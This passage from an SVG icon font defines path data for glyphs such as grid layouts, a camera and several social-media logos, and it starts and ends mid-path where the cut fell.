88.471h30.118v30.118h-30.118v-30.118zM331.294 148.706h30.118v30.118h-30.118v-30.118z" />
<glyph unicode="&#xe737;" d="M30.117 449.882h90.353v-90.353h-90.353v90.353zM150.588 359.529h90.353v90.353h-90.353v-90.353zM271.059 359.529h90.353v90.353h-90.353v-90.353zM391.529 449.882v-90.353h90.353v90.353h-90.353zM30.117 239.059h90.353v90.353h-90.353v-90.353zM150.588 239.059h90.353v90.353h-90.353v-90.353zM271.059 239.059h90.353v90.353h-90.353v-90.353zM391.529 239.059h90.353v90.353h-90.353v-90.353zM30.117 118.588h90.353v90.353h-90.353v-90.353zM150.588 118.588h90.353v90.353h-90.353v-90.353zM271.059 118.588h90.353v90.353h-90.353v-90.353zM391.529 118.588h90.353v90.353h-90.353v-90.353zM30.117-1.882h90.353v90.353h-90.353v-90.353zM150.588-1.882h90.353v90.353h-90.353v-90.353zM271.059-1.882h90.353v90.353h-90.353v-90.353zM391.529-1.882h90.353v90.353h-90.353v-90.353z" />
<glyph unicode="&#xe738;" d="M0 480h150.588v-150.588h-150.588v150.588zM180.706 329.412h150.588v150.588h-150.588v-150.588zM361.412 480v-150.588h150.588v150.588h-150.588zM0 148.706h150.588v150.588h-150.588v-150.588zM180.706 148.706h150.588v150.588h-150.588v-150.588zM361.412 148.706h150.588v150.588h-150.588v-150.588zM0-32h150.588v150.588h-150.588v-150.588zM180.706-32h150.588v150.588h-150.588v-150.588zM361.412-32h150.588v150.588h-150.588v-150.588z" />
<glyph unicode="&#xe739;" d="M0 480h210.823v-210.823h-210.823v210.823zM271.059 480v-210.823h210.824v210.823h-210.823zM0-1.882h210.823v210.824h-210.823v-210.823zM271.059-1.882h210.824v210.824h-210.823v-210.823z" />
<glyph unicode="&#xe73a;" d="M30.117 480h90.353v-512h-90.353v512zM150.588-32h90.353v512h-90.353v-512zM271.059-32h90.353v512h-90.353v-512zM391.529 480v-512h90.353v512h-90.353z" />
<glyph unicode="&#xe73b;" d="M0 480h150.588v-512h-150.588v512zM180.706-32h150.588v512h-150.588v-512zM361.412 480v-512h150.588v512h-150.588z" />
<glyph unicode="&#xe73c;" d="M0 480h240.941v-512h-240.941v512zM271.059 480v-512h240.941v512h-240.941z" />
<glyph unicode="&#xe73d;" d="M391.529 480h-271.059c-66.259 0-120.471-54.212-120.471-120.471v-271.059c0-66.259 54.212-120.47 120.471-120.47h271.059c66.259 0 120.471 54.212 120.471 120.471v271.059c0 66.259-54.212 120.471-120.471 120.471zM481.882 88.471c0-49.815-40.538-90.353-90.353-90.353h-271.059c-49.815 0-90.353 40.538-90.353 90.353v180.706h96.588c-8.614-18.372-13.764-38.641-13.764-60.236 0-78.878 64.18-143.059 143.059-143.059s143.059 64.18 143.059 143.059c0 21.595-5.15 41.863-13.764 60.236h96.587v-180.706zM368.941 208.941c0-62.284-50.658-112.941-112.941-112.941s-112.941 50.658-112.941 112.941 50.658 112.941 112.941 112.941 112.941-50.658 112.941-112.941zM365.99 299.294c-26.262 31.894-65.536 52.706-109.99 52.706s-83.727-20.812-109.99-52.706h-115.892v60.236c0 49.815 40.538 90.353 90.353 90.353h271.059c49.815 0 90.353-40.538 90.353-90.353v-60.236h-115.892zM435.32 398.020v-39.092c0-9.005-7.349-16.354-16.324-16.354h-41.201c-9.036 0.030-16.384 7.379-16.384 16.354v39.092c0 9.005 7.349 16.354 16.384 16.354h41.201c8.975 0 16.324-7.349 16.324-16.354z" />
<glyph unicode="&#xe73e;" d="M512 401.243v-39.394h-78.757v-78.788h-39.394v78.788h-78.757v39.394h78.757v78.758h39.394v-78.758h78.757zM312.923 95.096c0-35.388-16.896-64-43.068-86.769-35.388-30.479-83.697-40.327-129.235-40.327-57.525 0-140.619 24.606-140.619 95.985 0 14.457 4.939 28.642 11.415 41.563 27.347 55.356 112.881 69.541 167.966 71.077-10.119 13.221-19.667 28.582-19.667 45.839 0 10.149 3.644 16.926 6.776 26.444-7.409-0.904-14.457-1.536-21.534-1.536-59.693 0-111.375 44.002-111.375 105.864 0 58.458 45.207 108.303 101.196 120.591 18.793 4.036 38.129 6.174 57.524 6.174h134.505l-41.532-24.305h-41.593c30.509-19.065 45.869-56.32 45.869-90.774 0-81.529-68.94-87.673-68.94-128.301 0-39.695 92.31-55.387 92.31-141.523zM232.659 333.839c0 46.772-25.268 123.995-82.191 123.995-40.267 0-59.964-35.69-59.964-72.012 0-46.743 30.75-119.988 85.534-119.988 42.105 0.030 56.621 30.479 56.621 68.005zM269.553 68.623c0 43.068-40.358 67.072-71.71 88.938-5.24 0.603-10.18 0.603-15.42 0.603-50.417 0-125.531-15.993-125.531-79.993 0-59.060 66.469-81.86 115.712-81.86 45.839 0 96.948 18.462 96.948 72.313z" />
<glyph unicode="&#xe73f;" d="M393.849 145.243c0-22.468-11.716-59.091-39.394-59.091-27.708 0-39.424 36.623-39.424 59.091 0 22.438 11.716 59.091 39.424 59.091 27.678 0 39.394-36.653 39.394-59.091zM157.546 204.333c-27.678 0-39.394-36.653-39.394-59.091 0-22.468 11.716-59.091 39.394-59.091 27.678 0 39.394 36.623 39.394 59.091 0 22.438-11.716 59.091-39.394 59.091zM512 199.394c0-34.183-3.373-70.476-18.764-101.858-40.629-82.161-152.305-90.142-232.298-90.142-81.228 0-199.68 7.048-241.845 90.142-15.722 31.082-19.095 67.675-19.095 101.858 0 44.935 12.318 87.371 41.864 121.826-5.541 16.926-8.313 34.786-8.313 52.344 0 23.070 5.21 46.11 15.691 67.072 48.61 0 79.692-21.233 116.615-50.146 31.082 7.379 63.066 10.752 95.082 10.752 28.913 0 58.157-3.102 86.166-9.849 36.623 28.612 67.675 49.243 115.682 49.243 10.481-20.932 15.692-44.002 15.692-67.072 0-17.558-2.771-35.087-8.313-51.712 29.546-34.756 41.834-77.523 41.834-122.459zM443.060 145.243c0 47.074-28.582 88.606-78.757 88.606-20.3 0-39.665-3.704-59.995-6.476-15.993-2.47-31.985-3.373-48.309-3.373s-32.316 0.904-48.309 3.373c-19.998 2.771-39.695 6.476-59.995 6.476-50.146 0-78.757-41.532-78.757-88.606 0-94.148 86.137-108.604 161.22-108.604h51.712c75.084-0.030 161.19 14.457 161.19 108.604z" />
<glyph unicode="&#xe740;" d="M219.708 224c0-60.657-49.212-109.839-109.809-109.839-60.687 0-109.9 49.182-109.9 109.839s49.212 109.839 109.9 109.839c60.596 0 109.809-49.182 109.809-109.839zM512 224c0-60.657-49.212-109.839-109.899-109.839-60.596 0-109.809 49.212-109.809 109.839s49.212 109.839 109.809 109.839c60.687 0 109.899-49.182 109.899-109.839zM481.882 224c0 43.972-35.78 79.721-79.781 79.721-43.942 0-79.692-35.78-79.692-79.721s35.75-79.721 79.692-79.721c44.002 0 79.781 35.75 79.781 79.721z" />
<glyph unicode="&#xe741;" d="M375.296 312.245l-9.306-88.245h-70.536v-256h-105.954v256h-52.796v88.245h52.796v53.127c0 71.771 29.846 114.628 114.688 114.628h70.505v-88.245h-44.123c-32.918 0-35.117-12.438-35.117-35.418v-44.092h79.842z" />
<glyph unicode="&#xe742;" d="M507.572 348.356l-159.503 104.026-92.070-76.439-91.738 76.439-159.834-104.026 93.365-74.572-93.335-74.752 103.725-67.554v-46.171l148.089-88.516 148.359 88.486v46.622l102.912 67.162-93.305 74.722 93.334 74.572zM350.178 415.036l106.014-69.15-67.222-53.669-107.219 65.957 68.428 56.862zM361.412 273.784l-105.412-65.024-105.412 65.024 105.412 64.874 105.412-64.874zM55.808 345.886l106.225 69.15 68.216-56.832-107.249-65.988-67.192 53.669zM55.778 201.563l67.222 53.88 107.279-66.198-68.246-56.923-106.255 69.24zM374.513 102.385l-118.212-70.565-117.971 70.536v9.487l25.962-16.896 91.769 76.499 92.040-76.499 26.443 17.257v-9.819zM456.222 201.532l-106.044-69.21-68.457 56.923 107.249 66.198 67.252-53.91z" />
<glyph unicode="&#xe743;" d="M256 480c-141.372 0-256-114.628-256-256s114.628-256 256-256 256 114.628 256 256-114.628 256-256 256zM481.702 220.356c-62.494 13.733-117.339 12.74-164.714 2.771-7.56 18.884-16.143 38.34-25.57 58.127 50.628 19.516 99.147 47.767 136.975 88.365 33.31-39.394 53.489-90.172 53.489-145.619 0-1.235-0.18-2.409-0.18-3.644zM407.281 391.243c-34.937-37.858-80.956-64.301-129.416-82.522-22.889 44.212-50.899 89.148-84.751 132.066 19.998 5.813 41.050 9.095 62.886 9.095 58.248 0 111.195-22.347 151.281-58.639zM163.539 429.854c34.124-42.075 62.102-86.859 85.173-131.102-89.57-27.708-179.682-30.961-214.257-31.021 14.276 72.493 63.368 132.518 129.084 162.124zM30.117 224c0 4.548 0.422 9.036 0.663 13.523 1.958-0.030 4.036-0.030 6.385-0.030 39.334 0 132.578 3.764 225.34 33.551 9.036-18.823 17.408-37.496 24.697-55.537-108.574-33.159-172.755-111.586-196.156-145.348-37.677 40.358-60.928 94.358-60.928 153.841zM113.182 49.197c17.95 27.136 78.336 105.954 185.073 137.637 28.943-78.245 42.315-142.878 47.164-170.195-27.437-11.866-57.645-18.522-89.419-18.522-54.151 0-103.876 19.185-142.818 51.079zM373.459 31.428c-5.964 32.015-19.155 91.618-45.267 162.786 43.49 8.433 93.636 8.674 150.829-4.367-10.27-67.042-49.935-124.356-105.563-158.419z" />
<glyph unicode="&#xe744;" d="M421.677 144.941c-14.125 20.3-21.203 43.37-21.203 68.608 0 23.371 6.776 44.635 19.998 63.699 7.379 10.752 19.065 22.769 35.087 36.292-10.451 12.951-21.263 23.402-32.015 30.78-19.094 13.221-40.9 19.998-65.536 19.998-15.089 0-32.918-3.704-53.218-10.451-20.329-7.077-35.087-10.481-44.002-10.481-7.108 0-21.263 3.072-42.496 9.246-21.534 6.144-39.394 9.216-54.453 9.216-35.418 0-64.332-14.788-87.371-44.303-23.070-29.846-34.756-68.005-34.756-115.079 0-50.447 15.39-101.828 45.207-154.774 30.449-52.916 60.928-79.692 92.612-79.692 10.149 0 23.703 3.373 40.629 10.481 16.655 6.747 31.382 10.149 43.7 10.149 12.62 0 28.281-3.072 46.442-9.849 18.492-6.445 32.618-9.849 43.099-9.849 26.142 0 52.615 20.028 79.089 60.325 17.829 26.774 30.148 52.615 37.828 76.921-18.131 5.512-34.454 18.432-48.64 38.762zM407.281 45.764c-19.788-30.118-38.942-46.743-53.911-46.743-4.428 0-13.824 1.416-32.557 7.951-20.872 7.8-40.057 11.746-56.983 11.746-16.293 0-34.786-4.156-55.356-12.499-17.468-7.319-26.052-8.101-28.943-8.101-18.914 0-42.526 22.95-66.379 64.362-27.799 49.363-41.322 95.142-41.322 139.987 0 40.237 9.337 71.891 28.371 96.557 17.438 22.317 37.677 32.708 63.639 32.708 12.077 0 27.166-2.65 46.050-8.041 31.654-9.186 43.49-10.421 50.868-10.421 12.8 0 30.419 3.976 53.519 12.017 17.74 5.903 32.437 8.915 43.671 8.915 18.341 0 34.183-4.788 48.49-14.728 1.988-1.386 4.066-2.952 6.144-4.668-6.867-7.108-12.469-13.884-16.926-20.389-16.866-24.275-25.389-51.471-25.389-80.896 0-31.563 8.945-60.416 26.624-85.836 10.661-15.209 22.528-27.347 35.599-36.322-6.536-15.029-14.998-30.298-25.209-45.598zM283.829 360.613c-7.077-2.168-17.529-4.005-31.985-5.24 0.632 30.449 8.613 56.923 24.004 79.059 15.39 22.197 41.201 37.255 76.95 45.568 0.603-2.771 1.204-4.94 1.506-6.776 0-2.139 0.332-3.976 0.332-6.144 0-12.62-3.072-26.774-8.915-41.863-6.144-15.39-15.692-29.546-28.642-42.466-11.084-11.053-22.166-18.432-33.25-22.137z" />
<glyph unicode="&#xe745;" d="M114.718 308.45h282.594v-205.011c0-18.764-15.119-33.882-33.521-33.882h-23.161v-69.873c0-17.558-14.125-31.684-31.654-31.684-17.558 0-31.774 14.156-31.774 31.684v69.873h-42.406v-69.873c0-17.529-14.215-31.684-31.774-31.684-17.197 0-31.382 14.156-31.382 31.684l-0.271 69.873h-22.799c-18.733 0-33.852 15.089-33.852 33.882v205.011zM70.987 314.293c-17.529 0-31.714-14.186-31.714-31.383v-132.397c0-17.558 14.185-31.684 31.714-31.684s31.383 14.156 31.383 31.684v132.397c0 17.197-14.095 31.382-31.382 31.382zM398.216 319.533h-284.732c0 48.941 29.274 91.437 72.674 113.573l-21.895 40.298c-1.235 2.168-0.632 4.94 1.536 6.174 2.138 0.933 4.94 0.332 6.174-1.868l22.137-40.628c18.823 8.342 39.756 12.95 61.892 12.95s43.068-4.608 61.892-12.921l22.137 40.629c1.235 2.168 4.036 2.771 6.174 1.868 2.168-1.235 2.771-4.006 1.536-6.174l-21.895-40.298c43.129-22.166 72.373-64.662 72.373-113.604zM203.023 382.931c0 6.476-5.21 12.017-11.957 12.017-6.506 0-11.716-5.541-11.716-12.017 0-6.445 5.21-11.987 11.716-11.987 6.746-0.030 11.957 5.512 11.957 11.987zM332.649 382.931c0 6.476-5.211 12.017-11.716 12.017-6.776 0-11.957-5.541-11.957-12.017 0-6.445 5.211-11.987 11.957-11.987 6.505-0.030 11.716 5.512 11.716 11.987zM441.012 314.293c-17.257 0-31.382-13.854-31.382-31.383v-132.397c0-17.558 14.125-31.684 31.382-31.684 17.529 0 31.714 14.156 31.714 31.684v132.397c-0.030 17.529-14.185 31.382-31.714 31.382z" />
<glyph unicode="&#xe746;" d="M426.587 480h-381.41c-24.907 0-45.176-20.269-45.176-45.176v-421.647c0-24.908 20.269-45.176 45.176-45.176h421.647c24.908 0 45.176 20.269 45.176 45.176v383.217l-85.413 83.606zM240.941 449.882v-120.47h90.353v120.47h30.118v-150.588h-240.941v150.588h120.47zM90.353-1.882v180.706h331.294v-180.706h-331.294zM481.882 13.176c0-8.283-6.776-15.059-15.059-15.059h-15.059v210.823h-391.529v-210.823h-15.059c-8.313 0-15.059 6.776-15.059 15.059v421.647c0 8.283 6.746 15.059 15.059 15.059h45.177v-180.706h301.176v180.706h22.769l67.584-66.138v-370.567z" />
<glyph unicode="&#xe747;" d="M466.824 480h-381.41l-85.413-83.606v-383.217c0-24.908 20.269-45.176 45.176-45.176h421.647c24.908 0 45.176 20.269 45.176 45.176v421.647c0 24.907-20.269 45.176-45.176 45.176zM391.529 449.882v-60.236h-240.941v60.236h240.941zM90.353-1.882v30.118h331.294v-30.118h-331.294zM481.882 13.176c0-8.283-6.747-15.059-15.059-15.059h-15.059v60.236h-391.529v-60.236h-15.059c-8.313 0-15.059 6.776-15.059 15.059v370.567l67.584 66.138h22.769v-90.353h301.176v90.353h45.176c8.313 0 15.059-6.776 15.059-15.059v-421.647zM256 329.412c-58.127 0-105.412-47.285-105.412-105.412s47.285-105.412 105.412-105.412 105.412 47.284 105.412 105.412-47.284 105.412-105.412 105.412zM256 148.706c-41.502 0-75.294 33.762-75.294 75.294s33.792 75.294 75.294 75.294 75.294-33.762 75.294-75.294-33.792-75.294-75.294-75.294z" />
<glyph unicode="&#xe748;" d="M286.118-16.941c-9.849 1.747-19.998 3.163-30.419 3.163-10.119 0-20.269-1.445-30.388-3.163l3.764 204.77c-53.88 92.943-104.569 187.603-163.9 277.113 10.12-2.62 20.54-4.337 31.262-4.337s21.715 2.048 32.136 4.337c40.538-71.861 84.57-141.613 127.126-212.269 42.857 70.084 88.335 139.867 127.157 212.269 10.12-2.62 20.57-4.066 30.961-4.066 11.023 0 22.317 1.445 33.009 4.066-23.19-31.865-42.285-66.59-62.253-100.473-34.484-58.789-68.367-117.609-102.25-176.64l3.795-204.77z" />
<glyph unicode="&#xe749;" d="M496.941 224c0-132.819-108.092-240.941-240.941-240.941s-240.941 108.123-240.941 240.941 108.092 240.941 240.941 240.941 240.941-108.123 240.941-240.941zM485.918 224c0 126.644-103.243 229.918-229.918 229.918s-229.918-103.274-229.918-229.918 103.243-229.918 229.918-229.918 229.918 103.274 229.918 229.918zM67.222 308.179l98.696-270.276c-69.12 33.642-116.706 104.358-116.706 186.097 0 29.816 6.475 58.368 18.010 84.179zM379.693 167.529l-20.45-68.849-74.752 222.088c0 0 12.378 0.813 23.673 2.168 11.023 1.356 9.698 17.769-1.325 16.926-33.611-2.409-55.145-2.68-55.145-2.68s-20.148 0.301-54.302 2.71c-11.294 0.813-12.649-16.113-1.356-16.926 10.481-1.084 21.504-2.198 21.504-2.198l32.256-88.185-45.177-135.53-75.294 223.714c0 0 12.379 0.813 23.673 2.168 11.023 1.356 9.698 17.769-1.325 16.926-33.37-2.409-55.145-2.68-55.145-2.68-3.764 0-8.313 0.271-13.162 0.271 36.834 56.229 100.292 93.334 172.635 93.334 53.79 0 102.731-20.721 139.565-54.332-0.813 0-1.868 0-2.68 0-20.179 0-34.695-17.498-34.695-36.593 0-16.926 9.939-31.202 20.42-48.369 8.101-13.733 16.926-31.473 16.926-57.043 0.030-17.679-7.198-38.159-15.842-66.922zM323.192 31.97c0.271-1.054 0.813-2.108 1.356-2.952-21.504-7.529-44.363-11.836-68.578-11.836-20.148 0-39.785 3.012-58.368 8.613l61.862 180.133 63.729-173.959zM462.788 224c0-76.348-41.412-142.788-103.002-178.567l63.187 182.332c10.481 30.148 15.872 53.218 15.872 74.24 0 7.5-0.542 14.517-1.627 21.233 16.173-29.575 25.57-63.217 25.57-99.238z" />
<glyph unicode="&#xe74a;" d="M485.858 410.7c-17.468 22.166-54.091 23.010-79.661 19.185-20.48-3.404-90.293-34.063-113.755-107.791 41.773 3.404 63.849-3.042 59.633-49.002-1.747-19.576-11.535-40.478-22.166-60.958-12.83-23.372-36.171-69.421-67.313-36.171-27.678 29.817-25.992 86.889-31.924 124.808-3.885 21.324-7.68 47.737-14.517 69.873-5.994 18.764-20.059 41.292-36.623 46.442-18.311 5.15-40.93-2.981-54.121-10.632-41.834-24.757-69.451-59.693-110.351-88.636v-3.012c13.613-6.837 9.396-17.89 20.028-19.606 25.148-3.373 48.941 23.492 65.626-4.638 10.21-17.017 13.192-35.78 19.547-54.151 8.915-24.666 15.39-51.531 22.588-79.661 11.927-48.188 26.444-119.717 68.156-137.246 20.932-8.945 52.887 3.012 68.638 12.83 43.399 25.6 78.005 62.644 106.496 100.954 66.892 89.54 103.123 191.759 108.664 221.154 3.825 20.058 3.404 40.508-8.945 56.26z" />
<glyph unicode="&#xe74b;" d="M459.385 328.268c0.332-4.548 0.332-9.096 0.332-13.673 0-138.692-105.592-298.526-298.556-298.526-59.452 0-114.688 17.228-161.16 47.104 8.463-0.964 16.595-1.265 25.359-1.265 49.062 0 94.178 16.565 130.259 44.815-46.14 0.964-84.781 31.202-98.093 72.794 6.475-0.964 12.98-1.627 19.757-1.627 9.457 0 18.884 1.295 27.648 3.554-48.068 9.758-84.148 51.983-84.148 102.972 0 0.332 0 0.994 0 1.295 13.974-7.771 30.208-12.649 47.435-13.312-28.251 18.853-46.773 51.019-46.773 87.371 0 19.486 5.21 37.376 14.306 52.977 51.652-63.699 129.295-105.291 216.365-109.809-1.656 7.8-2.62 15.932-2.62 24.064 0 57.796 46.803 104.9 104.93 104.9 30.208 0 57.495-12.649 76.68-33.13 23.702 4.548 46.411 13.312 66.59 25.329-7.8-24.365-24.365-44.845-46.14-57.796 21.142 2.259 41.592 8.101 60.446 16.233-14.306-20.781-32.166-39.334-52.615-54.272z" />
<glyph unicode="&#xe74c;" d="M274.191 464.941v-121.735h114.236v-75.596h-114.236v-123.603c0-27.919 1.265-45.809 4.397-53.971 2.831-7.861 8.463-14.095 16.293-18.824 10.661-6.565 22.919-9.728 36.714-9.728 24.486 0 48.64 7.861 72.795 23.884v-75.926c-20.721-9.728-39.213-16.625-55.838-20.42-16.655-4.066-34.816-5.933-54.302-5.933-21.956 0-41.382 2.831-58.368 8.463-16.926 5.331-31.382 13.493-43.279 23.522-11.897 10.33-20.359 21.324-24.756 32.918-4.698 11.625-6.897 28.522-6.897 50.507v169.111h-53.339v68.096c18.793 6.235 35.117 15.059 48.61 26.323 13.523 11.626 24.185 25.42 32.346 41.412 8.132 16.324 13.794 36.714 16.926 61.5h68.698z" />
<glyph unicode="&#xe74d;" d="M496.941 3.147c0-10.993-9.096-20.089-20.089-20.089h-441.705c-10.963 0-20.088 9.096-20.088 20.089v441.705c0 10.993 9.095 20.089 20.088 20.089h441.736c10.963 0 20.089-9.096 20.089-20.089v-441.705zM235.911 404.706c0 5.662-4.397 10.029-10.029 10.029h-150.588c-5.662 0-10.029-4.397-10.029-10.029v-321.265c0-5.632 4.397-10.029 10.029-10.029h150.588c5.662 0 10.029 4.397 10.029 10.029v321.265zM446.735 404.706c0 5.662-4.397 10.029-10.029 10.029h-150.588c-5.662 0-10.029-4.397-10.029-10.029v-200.795c0-5.632 4.367-10.029 10.029-10.029h150.588c5.662 0 10.029 4.397 10.029 10.029v200.795z" />
<glyph unicode="&#xe74e;" d="M381.289-7.274c0-9.397-0.271-9.397-0.271-9.397v-0.271h-304.369c-9.427 0-9.427 0.271-9.427 0.271h-0.271v197.933h32.557v-166.219h249.555v166.22h32.226v-188.536zM316.507 47.631l-190.102-0.271v40.599l190.102 0.271v-40.599zM321.084 140.092l-3.493-40.327-189.59 17.468 3.764 40.327 189.32-17.468zM333.733 193.34l-10.511-39.303-183.657 49.243 10.481 39.274 183.687-49.212zM357.647 239.601l-20.721-34.937-163.75 96.768 20.691 34.966 163.78-96.798zM397.704 268.092l-33.31-22.859-107.339 157.034 33.611 23.161 107.038-157.334zM445.048 277.489l-40.087-6.988-32.527 187.452 40.056 6.988 32.557-187.452z" />
<glyph unicode="&#xe74f;" d="M26.564 174.848l-4.186-26.353c-0.211-1.054-0.813-1.868-1.867-1.868s-1.686 0.813-1.867 1.868l-3.584 26.353 3.554 26.774c0.211 1.054 0.843 1.868 1.867 1.868s1.657-0.813 1.867-1.868l4.216-26.774zM45.809 174.848l-5.421-42.436c-0.211-1.054-1.054-1.868-2.078-1.868-1.054 0-1.867 0.813-1.867 2.048l-4.819 42.255c4.819 43.309 4.819 43.309 4.819 43.309 0 1.024 0.813 1.868 1.867 1.868 1.024 0 1.867-0.844 2.078-1.868l5.421-43.309zM64.844 174.848l-5.21-49.574c0-1.235-1.054-2.289-2.319-2.289s-2.289 1.054-2.5 2.289l-4.397 49.574 4.397 51.23c0.211 1.476 1.265 2.5 2.5 2.5 1.265 0 2.319-1.024 2.319-2.5l5.21-51.23zM84.088 174.848l-4.819-51.019c-0.211-1.687-1.445-2.74-2.921-2.74-1.445 0-2.71 1.054-2.71 2.74l-4.397 51.019 4.397 52.706c0 1.686 1.265 2.71 2.71 2.71 1.476 0 2.71-1.024 2.921-2.71l4.819-52.706zM103.334 174.848l-4.397-51.471c-0.211-1.868-1.686-3.343-3.343-3.343s-3.132 1.476-3.132 3.343l-4.186 51.471 4.186 48.911c0 1.716 1.476 3.162 3.132 3.162 1.686 0 3.132-1.476 3.343-3.162l4.397-48.911zM122.971 174.848l-4.397-51.471c0-2.048-1.686-3.764-3.554-3.764-2.078 0-3.554 1.716-3.764 3.764l-3.764 51.471c3.764 79.51 3.764 79.51 3.764 79.51 0.241 2.048 1.686 3.734 3.764 3.734 1.868 0 3.554-1.686 3.554-3.734l4.397-79.51zM142.215 174.426l-3.976-51.050c0-2.289-1.898-3.945-3.976-3.945-2.289 0-3.946 1.656-4.186 3.945l-3.343 51.050c3.343 97.882 3.343 97.882 3.343 97.882 0.211 2.289 1.868 3.976 4.186 3.976 2.078 0 3.976-1.687 3.976-3.976l3.976-97.882zM162.515 174.848l-3.764-50.628c-0.211-2.5-2.078-4.397-4.608-4.397-2.289 0-4.186 1.868-4.397 4.397l-3.343 50.628 3.343 105.834c0 2.5 2.108 4.608 4.397 4.608 2.5 0 4.397-2.108 4.608-4.608l3.764-105.834zM182.393 174.848l-3.373 109.387c-0.18 2.711-2.289 5.029-5 5.029-2.5 0-4.819-2.319-4.819-5.029l-2.952-109.387 2.952-50.417c0.211-2.711 2.319-4.819 4.819-4.819 2.71 0 4.819 2.108 5.030 4.819l3.343 50.417zM202.451 174.848l-3.132-49.995c0-2.921-2.289-5.24-5.24-5.24-2.922 0-5.030 2.319-5.21 5.24l-2.952 49.995 2.952 106.676c0 2.952 2.289 5.24 5.21 5.24 2.952 0 5.24-2.289 5.24-5.24l3.132-106.676zM222.961 174.637l-2.952-49.393c0-3.132-2.5-5.662-5.632-5.662s-5.662 2.53-5.843 5.662l-2.5 49.393 2.5 102.882c0.211 3.343 2.71 5.873 5.843 5.873 3.132 0 5.421-2.53 5.632-5.873l2.952-102.882zM243.23 174.637l-2.5 122.579c0 2.078-1.054 3.976-2.71 5-1.054 0.632-2.108 1.054-3.343 1.054-1.265 0-2.289-0.421-3.343-1.054-1.686-1.054-2.74-2.922-2.74-5l-0.211-1.235-2.108-121.103c0 0 0-0.211 2.319-49.363 0 0 0 0 0-0.241 0-1.235 0.422-2.5 1.265-3.524 1.265-1.476 2.922-2.289 4.819-2.289 1.686 0 3.132 0.813 4.186 1.868 1.265 1.024 1.868 2.5 1.868 4.187l0.211 5 2.289 44.123zM261.452 126.329c0-3.554-2.921-6.476-6.476-6.476s-6.476 2.921-6.716 6.476l-1.235 23.823-1.265 24.486 2.5 133v0.662c0.211 1.868 1.054 3.764 2.53 5 1.024 0.813 2.5 1.476 4.156 1.476 1.054 0 2.319-0.421 3.132-1.054 1.868-1.024 3.132-3.132 3.343-5.421l2.921-133.662-2.892-48.308zM437.76 119.612c-164.202 0-164.382 0-164.382 0-3.554 0.421-6.476 3.132-6.476 6.897v188.084c0 3.524 1.265 5.21 5.873 6.897 11.505 4.578 24.456 7.077 37.858 7.077 54.573 0 99.358-41.803 104.147-95.142 7.108 2.922 14.848 4.608 23.010 4.608 32.618 0 59.181-26.594 59.181-59.422-0.030-32.647-26.594-59-59.212-59z" />
<glyph unicode="&#xe750;" d="M496.941 83.411c0-55.507-44.875-100.352-100.382-100.352-55.537 0-100.382 44.845-100.382 100.352 0 3.493 0.301 7.228 0.603 10.661l-112.941 56.5c-17.86-16.625-42.044-26.986-68.397-26.986-55.537 0-100.382 44.845-100.382 100.412 0 55.507 44.845 100.352 100.382 100.352 26.353 0 50.508-10.33 68.397-26.955l112.941 56.44c-0.301 3.494-0.603 7.228-0.603 10.662 0 55.567 44.845 100.412 100.382 100.412 55.507 0 100.382-44.845 100.382-100.412 0-55.537-44.875-100.382-100.382-100.382-26.353 0-50.507 10.361-68.397 26.986l-112.941-56.47c0.301-3.464 0.632-7.228 0.632-10.661 0-3.464-0.332-7.228-0.632-10.661l112.941-56.531c17.89 16.655 42.075 27.015 68.397 27.015 55.507 0.060 100.382-44.785 100.382-100.382z" />
<glyph unicode="&#xe751;" d="M496.941 73.412c0-49.875-40.478-90.353-90.353-90.353h-301.176c-49.875 0-90.353 40.478-90.353 90.353v301.176c0 49.875 40.478 90.353 90.353 90.353h301.176c49.875 0 90.353-40.478 90.353-90.353v-301.176zM349.786 197.316c-17.558 0-33.551-6.897-45.478-18.191l-75.596 37.647c0.301 2.53 0.602 4.699 0.602 7.228s-0.301 4.698-0.632 7.228l75.595 37.617c11.926-11.294 27.919-18.191 45.478-18.191 36.714 0 66.831 30.087 66.831 67.132 0 36.714-30.118 66.831-66.831 66.831-37.014 0-67.132-30.118-67.132-66.831 0-2.5 0.301-4.699 0.632-7.198l-75.596-37.647c-11.897 10.993-27.889 17.89-45.447 17.89-36.714 0-66.831-29.786-66.831-66.831s30.117-66.831 66.831-66.831c17.559 0 33.551 6.897 45.477 17.89l75.595-37.647c-0.332-2.5-0.632-4.699-0.632-7.198 0-36.714 30.118-66.831 67.132-66.831 36.714 0 66.831 30.118 66.831 66.831 0 37.014-30.118 67.102-66.831 67.102z" />
<glyph unicode="&#xe752;" d="M469.263 180.751c0.723-4.849 1.204-9.939 1.204-14.788 0-39.394-23.070-75.806-64.603-103.002-40.569-26.474-93.997-41.050-150.829-41.050s-110.501 14.577-150.829 41.050c-41.803 27.196-64.603 63.608-64.603 103.002 0 5.331 0.482 10.661 1.205 16.022-15.3 9.698-25.75 26.955-25.75 46.411 0 30.328 24.546 54.875 54.874 54.875 13.613 0 26.263-5.12 35.96-13.372 38.882 24.787 89.63 38.882 143.781 39.876l32.557 102.701c1.445 4.608 6.325 7.288 11.173 6.325l84.3-19.908c7.017 16.023 23.070 27.196 41.532 27.196 25.028 0 45.176-20.42 45.176-45.207 0-24.998-20.149-45.418-45.176-45.418-24.787 0-44.935 20.179-45.176 44.936l-76.529 17.98-28.16-88.877c51.23-2.168 99.087-16.293 136.012-40.327 9.698 8.734 22.588 14.095 36.683 14.095 30.329 0 54.875-24.546 54.875-54.875 0-20.42-11.173-38.159-27.678-47.646zM46.14 201.412c7.77 20.872 22.588 40.327 43.7 57.103-5.541 3.855-12.62 6.053-19.908 6.053-19.908 0-36.172-16.263-36.172-36.172 0-10.722 4.849-20.42 12.379-26.985zM451.764 165.964c0 32.527-19.938 63.608-56.109 87.221-37.406 24.275-87.431 37.858-140.619 37.858s-103.244-13.613-140.649-37.858c-36.202-23.582-56.109-54.663-56.109-87.221 0-32.798 19.908-63.88 56.109-87.462 37.406-24.275 87.431-37.888 140.619-37.888s103.243 13.613 140.619 37.888c36.202 23.582 56.139 54.663 56.139 87.462zM183.627 158.916c-18.221 0-33.762 14.818-33.762 33.039 0 18.432 15.541 33.762 33.762 33.762s33.28-15.33 33.28-33.762c0-18.221-15.059-33.039-33.28-33.039zM333.733 110.547c3.644-3.614 3.644-9.698 0-13.342-16.264-16.264-41.532-24.034-77.493-24.034h-0.482c-35.96 0-61.229 7.771-77.493 24.034-3.644 3.644-3.644 9.728 0 13.342 3.644 3.675 9.457 3.675 13.131 0 12.619-12.62 33.521-18.673 64.362-18.673h0.482c30.63 0 51.742 6.053 64.361 18.673 3.644 3.675 9.457 3.675 13.132 0zM362.135 191.955c0-18.191-15.059-33.039-33.28-33.039s-33.762 14.818-33.762 33.039c0 18.432 